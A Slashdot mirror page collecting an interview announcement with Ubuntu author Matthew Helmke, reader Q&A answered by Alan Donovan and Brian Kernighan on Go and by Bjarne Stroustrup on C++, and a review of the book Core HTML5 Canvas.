Slashdot Mirror

Matthew Helmke (personal blog) is the author of the newly published 11th edition of Ubuntu Unleashed (published by Pearson); this updated edition of the book will cover the OS through Ubuntu's 15.10 and (forthcoming) 16.04 releases. Helmke is also a former Ubuntu Forum administrator, a musician, an entrepreneur, and a long-time Slashdot reader who now leads a "nice quiet life in Iowa." Ask Matthew about what it's like to be a Linux book author and community leader, and his thoughts on Canonical, the goods and bads of modern Linux distributions, and the future of Ubuntu -- especially relevant with the upcoming release of the first Ubuntu-based tablet. (Remember, Matthew isn't responsible for gripes you may have with either Ubuntu or Canonical, but he might have some good solutions to particular problems.) Ask as many questions as you'd like; we just ask that you keep them on-topic, and please stick to one question per post.

Who would you like to see interviewed on Slashdot? Drop us a line at feedback@slashdot.org.

A few weeks ago you had the chance to ask Alan Donovan and Brian Kernighan about programming and their upcoming book, The Go Programming Language (available as an eBook Friday the 20th). Below you'll find their answers to your questions.
Donovan/Kernighan: Thanks to all the Slashdot readers who posed such thoughtful and provoking questions; we’re sorry that space limitations prevent us from answering more of them. Neither of us is part of the core Go team, so we can’t give authoritative answers for some of the questions that deal with future plans for the language or tools.



OpenGL and LockOSThread
by Anonymous Coward

Hi, I've stopped using Go when I saw the hacky stuff I need to do to get libraries like OpenGL to behave correctly. Are there any plans to fix this?

Donovan: The crux of the problem is that many C libraries such as OpenGL implicitly use the identity of the calling thread to store context information. In some cases, this is because the API was designed before multithreading was the norm, when global variables could be safely used to store context information. In other cases, this design is merely a matter of convenience, since it saves passing an extra parameter to every call.

The designers of Go rejected thread-local storage (TLS) because of its tendency to cause "action at a distance": it makes programs slightly shorter but much harder to read. (See p.282 of our book.) Since the lack of TLS in Go is considered a feature, there are no plans to "fix" it, but it may be possible to make TLS-heavy C libraries work better with Go. My colleague David Crawshaw just gave a talk at DotGo 2015 in Paris about this very issue as it concerns OpenGL.



Why was package versioning left out?
by genocitizen

Why was package versioning left out? And are you guys still fond of this decision? As I use Go more and more I see this to be the weak spot; software has been around for many decades, and we all know that it is continuous evolution. Go's import system does not allow specifying or hinting a version, nor does the `go get` command (although it supports major VCSes), and that's how hacks like gopkg.in have been conceived. And it's not like package managers for other languages haven't already solved in a more or less elegant way the problem already...

Donovan: Go is designed for large programs, and versioning is notoriously hard in that context. About ten years ago, there was an experiment to introduce versioning into Google's build system (which was designed by Rob Pike and others). It failed because of the "diamond dependency" problem, which I'm sure many of you have heard of---it's the classic problem of version numbering. Consider four packages A, B, C, D, where A depends on B and C, and B and C both depend on D. This is a diamond dependency. If the author of B decides that only version 1 of D will do, and the author of C requires at least version 2 of D, you have an impossible set of constraints. If you're lucky, you might be able to build A with both the old and the new versions of D, but in general this doesn't work. Since that experiment, Google hasn't touched automated versioning again. The way we do versioning is simple but manual: we treat each version of a package as a separate entity with a distinct name (for example, "D1", "D2"), and work hard to limit the number of versions of each package---ideally to one. That’s why versioning hasn’t been a priority for us at Google. However, this August, the prolific Dave Cheney proposed a scheme for Go package version numbering, so perhaps we’ll see development of this idea in the near future.



Error Handling in Go
by JPyObjC Dude

Go language differs from many other languages in how it handles Errors. Can you summarize the benefits and drawbacks to the Go language error handling approach when compared to Java for large scale applications.

Kernighan: In general, Go strongly encourages being explicit about errors. The standard library functions almost all return an error status along with the function value and your code must do something with that error status; you can’t just ignore errors. In this respect, Go is similar to Java, where you have to either catch or throw errors; you can't just do nothing. This is a nuisance in small one-off programs, but it's a life-saver in larger ones. So both languages are doing "the right thing".

Where they differ is primarily in the use of exceptions. Go does not have an exception mechanism, so there's no direct way to handle all the errors in a single block as there is with Java's try/catch, though the defer statement can help to consolidate error handling. This means that Java code might be somewhat more compact (in this respect only!), but perhaps at the price of not providing as much precise information about what went wrong.

Our Go book spends quite a bit of time on the topic of error handling, and in most of the examples we've tried to show how to deal with errors properly rather than ignoring them, even though this can make the example programs a bit longer.

Donovan: I’ve written a fair amount of Java code and, in my experience, good error handling is about equally hard in both languages. However, Go reduces the syntactic cost of augmenting an error message as you propagate it, because you have to write more or less the same code whether or not you augment the error with new information. Java, by contrast, makes it so tempting to avoid writing try/catch/throw blocks that, too often, programmers propagate exceptions without thinking. It’s interesting that you can never divine such subtle pragmatic differences between languages merely from reading their specs.



Usage
by Behrooz Amoozad

For what scenarios and projects do You recommend it and for which you recommend against using Go?

Kernighan: Go is a very good general purpose language, and we would have no hesitation about using it for any new task. It seems especially well-suited for programs that involve networking or other concurrent tasks; goroutines are very convenient and efficient, and there is also good support for more traditional shared-memory approaches. Empirically, people who write new networking code tend to like Go. I personally would use it for anything where in the past I might have used C or Java or C++.

Go has also gotten some traction as a scripting language, a potential replacement for large Python scripts. This may seem a bit surprising, since scripting languages are very convenient for cobbling something together in a hurry. The problems come later, when the cobbled-together code starts to crash with type errors or other faults that could have been detected much earlier with a statically typed language. Go won't replace Awk for one-liners, nor is it likely to replace Python or Perl or Ruby for 10- or even 100-line programs, but after a while, the combination of type safety and efficiency is worth the somewhat higher up-front cost.



Why should I use Go?
by aaaaaaargh!

For someone like me who likes garbage collection, multiple dispatch, and extreme abstraction capabilities in high level languages like Common Lisp, and safety, compile-time error detection, readability, and speed in low level languages like Ada or Haskell, what are the benefits of using Go in comparison to these two different types of languages? What new useful features does Go bring?

Kernighan: Ada and (especially) Haskell don't seem like low-level languages and Haskell is inscrutable to newcomers, but those are quibbles. Go has everything you mention in both of your lists of desirable attributes (depending perhaps on what you mean by "extreme abstraction"), but it also provides concurrency in a convenient and efficient form; that's a big win for some kinds of applications.

Donovan: Go seems very plain when compared with languages like Common Lisp, C++, Java, or Python. It has no macros, no templates, no classloaders, no metaclasses. Features such as these are often the first things I, being a PL geek, rush to play with when writing toy programs in a new language, but they are not usually the things that matter the most when programming in the large. I can recall without fondness many days spent debugging overly clever uses of the C++ STL or non-hygienic Lisp macros or the Python __call__ method. The design of Go recognizes that simplicity, homogeneity, and familiarity of a large code base are more valuable to the team as a whole than the benefits to each individual of using their favorite (obscure) language features for each task.



Go’s potential
by Qbertino

What serious long-term real-world potential do you see for Go? How do you see the potential of Go replacing existing open source webstacks such as Apache and PHP, Python or Ruby? Was Go built with a technology update of existing approaches in mind? How feasible is it in your opinion to try and replace the existing complex stacks with pure Go runtimes?

Kernighan: The reason it took God only six days to create the universe is that he didn't have to deal with the embedded base. Realistically, no programming language is likely to completely replace major existing code bases; it's just too much work. Go is often a good choice for new projects or where one is planning to rewrite an existing system anyway, and it can provide a good interface to existing code through foreign function interfaces, particularly to C libraries. But wholesale replacements seem unlikely.

Donovan: I agree with Brian that Go isn’t likely to eliminate any other language or library, but that is not its goal. Go provides an attractive alternative. A good part of Go’s popularity comes from the ease with which you can build useful web servers and other distributed systems using little more than the components of the standard library. The library was produced recently, and thus with the benefit of hindsight, by systems experts, and it often makes third-party servers like Apache or frameworks like Rails unnecessary for the first steps---although of course similar frameworks do exist for Go too.



Official Go IDE?
by Qbertino

Is there an official cross-platform Go IDE in the works? Experience shows that adoption is accelerated by offering a solid toolkit that is easy to pick up and get started with - such as the formidable Android Studio IDE Google offers to developers. Are there any plans similar to this for Go? I would like to see it take the place of C++ in the development of performant end-user applications with GUIs - are there any officially sanctioned projects that aim to provide a serious GUI toolkit and stack based on Go?

Donovan: We agree that good IDE support is important for attracting new users to Go, though my colleagues and I came to this realization rather slowly as, perhaps unsurprisingly, most of us use very traditional editors like Vim, Emacs, SublimeText, and even Acme, which are not what most people think of as IDEs. This year, JetBrains have created a team to develop a Go plugin for IntelliJ so that IntelliJ IDEA users can build, test, debug, and refactor programs written in Go as easily as in any other language.

As for cross-platform GUI toolkits, there’s no canonical solution yet, though there have been some interesting experiments such as GXUI and Shiny.



Should Go replace Java?
by Martinjnh

Should Go replace Java as development platform/language for android?

Donovan: The Go team at Google is working hard to make it possible to use Go to write mobile applications on Android and iOS; see Hana Kim's GopherCon 2015 talk, for example. But for now this is just an experiment and, as Brian wrote above, it's not Go's goal to replace major existing code bases.



Safe Performance
by snadrus

Reimplementing the Gnu+Linux toolchain in GoLang could provide safety that decades of eyes on C could not (thinking about the recent BASH bugs & OpenSSL overruns). Even a small portion would add security to Android. Performance is close & 1.5's library loading should keep executables light. Is there interest in rebuilding Linux's base userland?

Donovan: Go is a good fit for these kinds of tools because the language has good runtime safety and a straightforward system call interface, and it compiles to static executables that start quickly and run efficiently. Portability might be a concern: while Go programs themselves are highly portable, Go's runtime currently targets only a handful of major architectures, far fewer than gcc and glibc support. I'm not aware of any rebuilding projects.



tEoPS
by M. D. Nahas

There many books on "how to program" but few on "how to program well". Brian, your book "The Elements of Programming Style" is a wonderful and a classic, but my students have a hard time reading the examples (Fortran 66 and PL/I). Is there any hope for an update? Is there any similar modern-language book that you recommend?
Michael Nahas (son of Joe Nahas)

P.S. I totally stole as much as I could from you when writing my tutorial for the language Coq. Sorry/Thanks!

Kernighan: The languages that Bill Plauger and I used in "The Elements of Programming Style" are either long gone (PL/1) or very much evolved (Fortran), so the code is indeed hard to read today, though most of the rules of good style are still valid. Bill and I once started a version in C but didn't get very far. One problem was that the original book relied almost exclusively on code fragments from textbooks. Modern textbooks are far better than they were 40 years ago; most code is syntactically correct and mostly works. So it was hard for us to find textbook examples to illustrate our rules. Another problem is that real programs are a lot bigger and more complicated than they were, and it's hard to find excerpts that would work in a book. So an update of EOPS isn't likely, much as it would be nice to have one.

As to other books, Josh Bloch and Scott Meyers have written excellent books on how to write good Java and C++ respectively. More broadly, I have always liked Steve McConnell's "Code Complete", and I take a fresh look at Fred Brooks's classic "The Mythical Man Month" every few years. There are plenty of other books about how to program well in various languages and environments; it's well worth reading some of them to see how other authors approach the topic.



C's current place in the world
by MountainLogic

As the legend has it, C was created to support operating system development. As time has gone by C++ has slipped into OS development on larger platforms. It seems that much of the current core use of mother C is centering on embedded processors (all the way down to 8 bit micros with 256 bytes of RAM) and drivers in larger systems. For current use what design choices in C do you see as wise and what would you change given the current usage of C. (P.S. Thank you for co-authoring the most wonderful, perfect, clear and concise technology document ever.)

Kernighan: Bear in mind that C is Dennis Ritchie's work; I can only claim to have written a book with him. Dennis was a great writer as well as a great programmer and language designer, and the book was very much a joint effort.

That said, C is indeed still popular for embedded systems and drivers, where efficiency and the ability to get right down to the hardware matters. I think that changing C today would be counter-productive; one of C's strengths is that it is quite stable. Indeed, I suspect (though without having data to prove it) that except for minor features like // comments most programmers use C as it was after the 1988 ISO standard; the C99 and C11 standards did not change much of programming practice.



Motivation for writing the book
by jameshwang

I was curious out of all the Golang books that currently exists, how does this book, "The Go Programming Language," differ from the rest and fit into the landscape of Golang? I've read some of the other books like "Go Programming Blueprints" and "Go in Action." Specifically with "Go in Action," the table of contents seems similar to your book.

I guess what was your motivation to write this book and how will it be different from all the rest? Brian, are you hoping this book becomes what "The C Programming Language" became but for Golang?

Kernighan: As it says in Ecclesiastes 12:12, "of making many books there is no end", which suggests that your question about whether another book is needed is an old one.

When one writes a book, there is always the belief or at least hope that one can do it "better" than others, not in any negative sense but just that new organization, examples, explanations, and writing will all combine in a way that readers will find helpful. Certainly that has been what Alan and I have tried to achieve with "The Go Programming Language". It would of course be wonderful if the Go book was as helpful to programmers as the C book seems to have been.

I have looked at only a couple of the many Go books that have already been written (and not the ones you mention), and in fact Alan and I quite consciously stopped even looking at titles once we started thinking about our own book, since we didn't want to inadvertently borrow from other authors.

Donovan: For me, one motivation was to write the book I wished I had been able to read when I started learning Go---a comprehensive book that covers not just the language and its library, but one that motivates the design choices, explores advanced features, flags the pitfalls, and conveys the style and aesthetics of the language.

Although comparisons with K&R are inevitable (and flattering), I don't think any technical book can ever be as influential as that one. It was not just a tutorial for the most important language of a (pre-Internet) generation, but also its reference manual and de facto spec. Today, of course, you can browse The Go Tour, Godoc, and The Go Language Specification from your cellphone. Libraries are larger and tooling is more important. A modern book must have a different emphasis. We've tried to show how all the parts fit together.

Alan Donovan is a member of Google’s Go team in New York and holds computer science degrees from Cambridge and MIT. Since 2005, he has worked at Google on infrastructure projects and was the co-designer of its proprietary build system, Blaze. Brian Kernighan is a professor in the Computer Science Department at Princeton University. He was a member of technical staff in the Computing Science Research Center at Bell Labs, where he worked on languages and tools for Unix. He is the co-author of several books, including The C Programming Language, and The Practice of Programming. Recently, the pair have co-authored a soon to be released book titled The Go Programming Language. Alan and Brian have agreed to give us some of their time to answer any questions you may have about the upcoming book, Go, and programming in general. Ask as many questions as you'd like, but please keep them to one per post.

Last week you had a chance to ask Bjarne Stroustrup about programming and C++. Below you'll find his answers to those questions. If you didn't get a chance to ask him a question, or want to clarify something he said, don't forget he's doing a live Google + Q & A today at 12:30pm Eastern. Cutting features and old syntax?
by Katatsumuri

Sometimes well-established languages keep adding new features and syntactic constructs until most developers are not even aware of all the possibilities and use maybe 20% in their usual daily work. The old features and syntax are kept around for compatibility and to keep the old guard content, even if cutting them would lead to faster compilation, more elegant language and less confusion.

This may be part of the reason for the constant introduction of new trendy languages with radically simplified syntax and libraries... Which then follow the same pattern. Few languages are introducing new paradigms, many are trying to be a "better" C++, Java, LISP, JavaScript or Perl.

Do you think this cycle is inevitable, or could it be a good idea to sometimes clean up the syntax and the obscure features in new specification versions, to keep the established languages more competitive?

Bjarne: Languages grow. The alternative is stagnation because there is nothing the maintainer of a large code base hates more than working code breaking – even if that code is full of avoidable errors. We dream of cleaning up the mess, but somehow there is never the month or couple of years needed. I dream of “cleaning up the mess” as much as the next guy, and I know the mess better than most. It is hard to evolve a language compatibly, but IMO it is harder still to make a major – worthwhile – breaking change. Stagnation is not something I can accept – we can and must do better (even if that takes compromises).

You probably didn’t mean that, but “syntax” isn’t the most important aspect of software development. People will suffer atrocious syntax to get valuable functionality (C++ template meta-programming is an example). Also, developers and maintainers of production code eventually tire of cute (often very terse) syntax. “Syntax” is the user-interface for programmers, rather than the system itself. What we hope for is a minimal and logical interface to a useful semantics.

For any reasonable definition of “paradigm” (a words I use only very rarely), there are very few new paradigms coming along, so people have to be happy with incremental changes. Slow steady progress can – over time – add up to major improvements. However, few people take the longer (decades) view.



On the evolution of C++
by stox

How do you feel about the evolution of C++ since it was first implemented with Cfront? What began as a pretty straightforward language has been expanded to significant complexity. Has this evolution been positive, or has it been an attempt to make the language apply to too many possible applications?

Bjarne: C++14 is a far better tool for software development than “C with Classes” was, far more powerful in the key areas that “C with Classes” was invented to deal with. It is more expressive, better checked, generates faster code, and is applicable in areas that “C with Classes” could not touch. The cost has been complexity. My aim has been constant: a direct mapping to hardware plus zero-overhead abstraction. C++ is not the best language for everyone and everything, but then I never promised that it would be. However, C++ is an excellent tool for attacking a vast variety of system design and implementation problems.

I hope that the tide has turned so that C++ is becoming more “novice friendly.” C++11 and C++14 are steps on that route: auto, range-for, lambdas, uniform initialization, concepts, etc., all makes it easier to express simple things simply (without loss of performance). For example, a friend sent me this C++99 code (simplified, of course, but from a large code base):

// old code:

std::vector::const_iterator cit = MemVec.cbegin();
for ( ; cit != v.end(); ++cit) {
if (LookForPatterm(*cit))
return true ;
}
return false;

He deemed this to be somewhat messy and in need of improvement. For starters, we can eliminate the long type name by letting auto deduce it:

// first step:

for (auto cit = MemVec.cbegin(); cit != v.end(); ++cit) {
if (LookForPatterm(*cit))
return true ;
}
return false ;

auto is the oldest C++11 feature. I implemented in in 1983/84, but was forced to remove it for C compatibility reasons. It provides the ability to deduce a type from and initializer; after all, the compiler knows the type of MemVec.cbegin() so why should I need to repeat it? Note how the scope of cit is now limited to its area of use.

We can simplify regular loops using a range-for, so we get:

// second simplification:

for (const auto& x : v)
{
if (LookForPatterm(x))
return true ;
}
return false ;

There is now no iterator, so it cannot be accidentally or deliberately modified in the loop. Now it is obvious that we should have used a standard-library algorithm:

// good:

return find_if(cbegin(v), cend(v), LookForPattern) != v.cend() ;

That’s where my friend stopped, observing that it was now also obvious how to use a lambda as the operation in other places. Being a fan of range/container algorithms, I would have said:

// my variant:

return find_if(v,LookForPattern)!=v.cend();

This involves having a range version of find_if lying around somewhere. For example:

// range version of std::find_if:

template
Iterator find_if(Cont& c, Pred p)
{
return std::find_if(begin(c),end(c),p);
}

Next time such an improvement is needed, I think my friend and his colleagues will jump directly to one of the later variants. With a bit of luck, they will even have tool to help them find candidates for simplification.



Regrets
by Anonymous Coward

What do you regret most in C++ and how would you like to change it?

Bjarne: No regrets! Seriously, a language grows up at a specific time and in a specific environment. To survive that language has to be viable at every stage of its evolution. I’d hate to second guess 1980s vintage Bjarne. He was at least as smart as I am and had a far better grasp of the world at the time. Simply saying, “if I had had a few million dollars for buying market share with ‘free’ libraries or for developing a better definition of templates C++ would have been better” just isn’t intellectually honest.

If I had a time machine, I just might jump back to 1987 and drop a sketch of a design of templates with concepts on Bjarne’s desk. He was working on the template design at the time and knew the problems with template parameter requirements well. Unfortunately, neither he nor anyone else at the time knew how to simultaneously get generality, performance, and well-specified interfaces. Given a bit of help from the time traveler, he might very well have gotten the point. Then, in 1990, we would have been able to write:

void sort(Sortable& c); // sort random-access sequences of elements with
void user(vector& vs, vector>& vc)

{
sort(vs); // OK
sort(vc); // error: vs not Sortable; complex does not have }

However, I don’t have a time machine, so we had to wait until next year (or now if you use the concepts branch of GCC).



Future of C++ Standard Library
by DaphneDiane

One of the recent concerns raised with C++ compared to other popular languages is the breadth of the standard library. I know that the C++ standard committee was looking at adding a C++ transformed version of Cairo to the standard. And of course there is boost. What else do you see coming to address the perceived API shortcomings?

Bjarne: C++ is a formally standardized language. It is defined by the ISO. Compared to other such languages, C++ has a huge and growing standard library. However, compared by commercially owned languages, such as Java and C#, the ISO C++ standard library is tiny. We – the C++ standards committee – do not have the resources to buy market share. The committee is trying to add useful libraries as fast as it can safely do so. The standard library is most important because it creates a common foundation, but it can never be sufficient for the needs of the huge community.

We somehow have to create a better “exchange” for open-source and other libraries. We will also have to work harder on library interoperability. There are a huge number of C++ libraries “out there,” but they tend not to be designed for interoperability and many producers of libraries have their very own programming styles and specialized assumptions.

To speed up standardization – especially the standardization of libraries – the ISO C++ standards committee has started “study groups” producing “technical specifications.” A technical specification is not a full-blown international standard, but it is a document produced by the order of 20 people and approved by the full committee. Current library TSs in progress are:

File system
Library foundation (e.g., optional and string_view)
Ranges (for people tired of saying v.begin(),v.end() and much, much more)
Concurrency (threads, etc.)
Parallelism (parallel algorithms, networking, and more)
Numerics (incl. SIMD)
Transactional Memory (has core language parts)
I/O (incl. 2D graphics)
See here for details.



ABI
by gbjbaanb

Do you think that one thing holding C++ back is the lack of a standardized binary interface?

Currently if I want to make a module that can be consumed by others (whether than is others using a different language, or a different C++ compiler, or even just to use a pre-built module without sources) I have to export everything as C and use its (de-facto if nothing else) binary standard.

I think an ABI for C++ would increase its "real world" attractiveness considerably with little, if any, overhead. Do you agree, or are there issues around this that make it a significant challenge (apart from vendor adoption of course).

Bjarne: A C++ ABI would be a huge boon to the C++ community, however, it is not an easy problem to solve technically and most C++ implementation providers have a huge user bases that would howl in outrage if binary compatibility with their previous version was broken.

To solve the technical problem, we would need the ABI to cover basic object layout (easy), class hierarchies (not hard), and abstractions using templates (hard). An ABI that could not handle std::vector, std::map, and similar user-supplied abstractions would be a failure. I do not (in any detail) know how to do that.

To solve the political problem, we would need all vendors on a platform to adopt that ABI (probably impossible except in the longer term) or provide it as an “exchange format” in addition to their traditional ABI.



Which feature would you add to C++?
by jonwil

If you could add one feature to C++ (either the language or the standard library) and have it adopted in the C++ standard and supported by all the compilers etc., what would it be and why?

Bjarne: Ah! Just one feature? You must be kidding, but I’ll say “concepts.” They will change the way people think of generic programming and of programming in general, and we’ll have them next year. They are already shipping in a branch of GCC and will be an ISO C++ TS (Technical Specification) in 2015 (I hope and expect).

People have mentioned more standard libraries and a standard ABI. I’d like to see higher-level concurrency models –the type-safe C++11 threads and locks are still too low level. I’d like to eliminate the need for the visitor pattern workaround; for example, see:

Y. Solodkyy, G. Dos Reis and B. Stroustrup: Open Pattern Matching for C++. ACM GPCE'13.
Y. Solodkyy, G. Dos Reis, and B. Stroustrup: Open and Efficient Type Switch for C++. Proc. OOPSLA'12.
P. Pirkelbauer, Y. Solodkyy, and B. Stroustrup: Open Multi-Methods for C++. ACM GPCE’07.

Remember that an academic paper plus an implementation does not add up to a complete standards proposal, but wouldn’t you like to be able to write:

bool intersect(virtual Shape&, virtual Shape&); // non-member virtual function

void user(Shape& s1, Shape& s2)
{
if (intersect(s1,s2)) //
//
}

Assuming suitable overloads of intersect() to handle Shapes that are Circles, Triangles, etc. The alternative today is a mess of if-statements, some clever special-purpose workaround, or an elaborate visitor setup.



C++ without the C
by kthreadd

Apple recently introduced a language they call Swift or Objective-C without the C. It is technically a completely different language from Objective-C though. When C++ started out it had the major benefit that it was (mostly) compatible with C which at the time was immensely popular, making it trivial to mix new C++ code with existing C code. Today C is still a popular language but not as widely used as it once was. Assuming that C++ could drop C compatibility, how would you take that opportunity to improve C++?

Bjarne: People tend to underestimate C. Today, we probably don’t need C compatibility (except to keep billions of lines of critical code running), but we do need a direct map to hardware. If we didn’t have C or the C-level subset of C++, we would have to find a different way to do that map. Languages without C’s problems typically rely on C or C++ to do their dirty work for them.

I think we should think more about isolating unsafe code in a program than to eliminate it. Putting the necessary unsafe code into a different language limits our control of it, limits what can be communicated to it, and typically imposes overheads.

That said, when people rail against C, and by implication C++, they usually (and correctly in case of C and C-style C++) point to two problems: lack of type safety and the lack of abstraction mechanisms. Together, those two problems leave people with lots and lots of low-level code in which bugs can hide (e.g., buffer overflows, invalid pointers, and resource leaks).

C++ attacks these problems by providing alternatives. You can write type-safe code in C++; you can write simple code that doesn’t leak or leave invalid pointers behind; you can do so with zero overhead compared to lower-level alternatives. Consider:

vector collect(const string& terminator)
{
vector res;
for (string s; cin>>s && s!=terminator; )
res.push_back(s);
return res;
}

void user() { auto ss = collect("end"); // ss is a vector
// }

I used C++11’s move semantics and auto to simplify that code. Note the absence of memory management code and the absence of leaks. Returning containers by value is simple and efficient in C++11 because the standard library provide move constructors for all containers, such as vector.

The problem is that many people don’t write such simple code and are stuck with the old problems hidden in lots of far more complicated code.

I don’t actually think that there is less C and C++ programming these days. I think that in absolute terms there is more than ever, and not just people working on “legacy code.” People are confused by unscientific estimates of usage and especially by the fact that there is much more software development these days, so that the amount of C and C++ is declining relative to the total. In particular, I think I see significant growth of C++ in its core domains. The number of C++ programmers today is more likely to be 4 or 5 million than the 3 million I estimated ten years ago. But it is hard to count programmers.



Hour of Code
by Orestesx

What is your opinion of the "Hour of Code" as promoted by CSEdWeek? Does it trivialize computer science education?

Bjarne: I guess that anything that popularizes hands-on software development experience is good. On that count, I’m in favor of Lego, programming contests, Raspberry Pie, etc. Too many people think science and (especially) engineering boring.

Do color change and explosive chemistry experiments trivialize chemistry? Do demonstrations of Newton’s cradle and prisms trivialize physics? No! You need to inspire and motivate students in preparation for the necessary hard work. I think Computer Science should be taught as a serious academic discipline – like Physics and Biology – for which years of work is needed for mastery, rather than as a basic skill that must be quickly mastered by all. I think the serious work should start in high school, like it is (or IMO should be) for mathematics, physics, and biology. It is not just child’s play. It could start in university if it wasn’t that students tend not to choose fields of study in university that they have not encountered in high school.

Not everybody can become a good programmer. The world needs a lot of programmers, maybe 20 million, but we don’t need a billion. We need to distinguish between the education of professionals and giving people a bit of computer literacy. People seem confused about this or unwilling to accept that serious preparation is needed for people who build serious software. Our lives and livelihood depends on software. Just think of the amount of computing that goes into delivering your food to your table: agriculture, transport, telecommunications, embedded systems, planning, scheduling, etc. You cannot milk a herd of cows without the help of computers these days! Or at least you cannot if you have to keep records of the cows’ health and production for the obligatory quality control. I would strongly prefer for critical software to be developed and maintained by professionals. I’m less concerned about the quality of your favorite videogame or the advertisements that pop up to annoy me when I try to read the news.

I’m more interested in the engineering part of computer science than the pure science part. Computer science is among other things a set of science-based practical skills, an engineering discipline.



Personal programming projects
by kthreadd

Apart from work, do you have any personal programming projects going on? Which type of programming do you like most and is there a particular project that you would like to implement?

Bjarne: I tend to look at three kinds of code: code that creates trouble in the context of the C++ standard (subtle cases and proposals), small experiments with programming techniques, and production code. This implies looking on a lot of libraries and writing lots of small examples. Unfortunately, my “day job” plus my standards work do not leave time for significant personal projects.



Code rejuvenation
by SansEverything

You speak a lot about code rejuvenation and bringing old code to new standards. As you are working on C++14, many compilers do not fully support C++11 yet. In the past, it was even worse. Don't you think that this lack of feature support from compilers is a major problem and the biggest obstacle to code rejuvenation?

Bjarne: No. C++11 and/or C++14 implementation availability is not a major problem. Both are getting remedied fast, faster than I would have believed a couple of years ago. The adoption of C++11 is far faster than the C++98 adoption was. Waiting a year or two is not a significant problem in this context. There is plenty of work that can be done today.

When I talk about “rejuvenation” (some people call it “modernization” or “upgrading”), I mean rewriting large amounts of code written in styles known to complicate comprehension, hide bugs, and hinder optimization. I’m thinking of C-style code, code overusing class hierarchies, and some examples of complex template metaprogramming. Such code also tend to prevent newer, better, and simpler techniques to be used in newer code. The reason is partly that the need interoperate with such code messes up new code, partly that programmers steeped in the old style are reluctant to believe that the newer techniques work.

For example, I’d like to replace uses of arrays and pointers with std::arrays and vectors. I’d like to eliminate macros. I’d like to replace old-style for loops with range-for loops. I’d like to eliminate overuse of free store (heap). I’d like to break up large functions into smaller and more precisely defined ones. I’d like to replace ad hoc code with algorithms. I’d like to replace hand-crafted containers with standard-library ones. If I can, I’d like to eliminate race conditions and increase the amount of concurrency. I want to do all that without adding run-time overheads.

Typically, we cannot afford to rewrite the old code by hand. So when I talk about rejuvenation, I focus on (static) code analysis and code transformation: we must automate the rejuvenation process as far as possible. The reason I don’t refer to this as “refactoring” is that I’m typically not interested in a process that produces 100% compatible code. Some of the transformations I want require human attention. I want major improvement, not bug compatibility. People are working to produce such tools.

eldavojohn writes "Core HTML5 Canvas is a book that focuses on illuminating HTML5 game development for beginning and intermediate developers. While HTML and JavaScript have long been a decent platform for displaying text and images, Geary provides a great programming learning experience that facilitates the canvas element in HTML5. In addition, smatterings of physics engines, performance analysis and mobile platform development give the reader nods to deeper topics in game development." Read below for the rest of eldavojohn's review. Core HTML5 Canvas author David Geary pages 723 publisher Prentice Hal rating 9/10 reviewer eldavojohn ISBN 9780132761611 summary An introduction to game development in HTML5's canvas that brings the developer all the way up to graphics, animation and basic game development. This book is written with a small introduction to HTML and JavaScript. While Geary does a decent job of describing some of those foundational skill sets, I fear that a completely novice developer might have a hard time getting to the level required for this text. With that in mind, I would recommend this book for people who already have at least a little bit of HTML and JavaScript development in their background. This book may also be useful to veteran developers of an unrelated language who can spot software patterns easily and aren't afraid to pick up JavaScript along the way. You can read all of Chapter One of the book here if you want to get a feeling for the writing. Geary also has sample chapters available on his site for the book, corehtml5canvas.com and maintains the code examples on Github. If you already write games, this book is likely too remedial for you (especially the explanations of sprites and collision detection) and the most useful parts would be Geary's explanation of how to produce traditional game elements with the modern HTML5 standards.

I have very few negative things to say about this text – many of which may be attributed to personal preferences. This book is code heavy. It starts off with a sweet spot ratio for me. I found I spent about twenty to thirty percent of my time scanning over HTML and JavaScript snippets inserted occasionally into passages. However, by the last chapters, I found myself poring over lengthier and lengthier listings that made me feel like I was spending sixty to seventy percent of my time analyzing the JavaScript code. To be fair, the author does do a good job of simply referencing back to concepts learned in other chapters but I wouldn't mind a re-explanation of those topics or a more in depth analysis of how those concepts interoperate. I also feel that it is risky to put so much code into print as that greatly impacts the shelf life of an unchanging book. The book itself warns on page 51 that toBlob() was a new specification added to HTML5 between writing the book and the book being published. I feel like this would warrant much more English explaining what you're accomplishing and why so that the book does not age as much from being tightly coupled to a snapshot of the specifications.

The code listings in this book are wonderfully colored to indicate quickly to the eye what part of the JavaScript language each piece is. I'm not sure how many copies suffer from this but my book happened to have a problem on some of the pages whereby the comprising colors did not line up. Here is a good example and a bad example just a few pages apart.

This was infrequent but quite distracting as the code became more and more predominant. Lastly, Geary briefly introduces the reader to amazing performance tools (jsPerf in Chapter 1 and again Browserscope in Chapter 4) early on and demonstrates how to effectively exercise it on small pieces of JavaScript. In the particular example he shows how subtle differences in handling image data can affect the performance inside different browsers (even different versions of the same browser as I'm sure the JavaScript engines are repeatedly tweaked). Since games are always resource intensive, I wondered why the author didn't take these examples to the next level and show the reader how to write unit tests (not really covered in the book). That way each of these functions could be extracted to a common interface where it would be selectively chosen based on browser identification. While this might be unnecessary for images, it would be a nod toward addressing the long pole in the tent when you look to squeeze cycles out of your code. Oddly, as more concepts are established and combined, these performance exercises disappear. I understand this book was an introduction to these side quests with a focus on game development but this was one logical step I wish had been taken further (especially in Chapter 9: The Ungame).

About a year ago, I started a hobby project to develop a framework for playing cards in the browser on all platforms. The canvas element would be the obvious tool of choice for accomplishing this goal. Unfortunately I began development using a very HTML4 attitude with (what I now recognize) was laughable resource management. This book really helped me further along in getting that hobby project to a more useable state.

The first chapter of the book introduces the reader to the basics of HTML5 and the canvas element. The author covers things like using clientX and clientY for mouse events instead of x and y. A simple clock is built and shows how to correctly use the basic drawing parts of the HTML5 specification. For readers unfamiliar with graphics applications, a lot of ground is covered on how you programmatically start by constructing an invisible path that will not be visually rendered until stroke() or fill() is called. The chapter also covers the basic event/listener paradigm employed by almost anything accepting user input. Geary explains how to properly save and restore the surface instead of trying to graphically undo what was just done.

An important theme through this book is how to use HTML elements alongside a canvas. This was one of the first follies of my "everything goes in canvas" attitude. If you want a control box in your application, don't reinvent the partially transparent box with paths and fills followed by mouse event handling over your canvas (actually covered in Chapter 10) – simply use an HTML div and CSS to position it over your canvas. Geary shows how to do this and would have saved me a lot of time. Geary discusses and shows how to manage off-screen canvases (invisible canvases) in the browser which comes in mighty handy when boosting performance in HTML5. The final parts of Chapter One focus on remedial math and how to correctly handle units of measure when working in the browser.

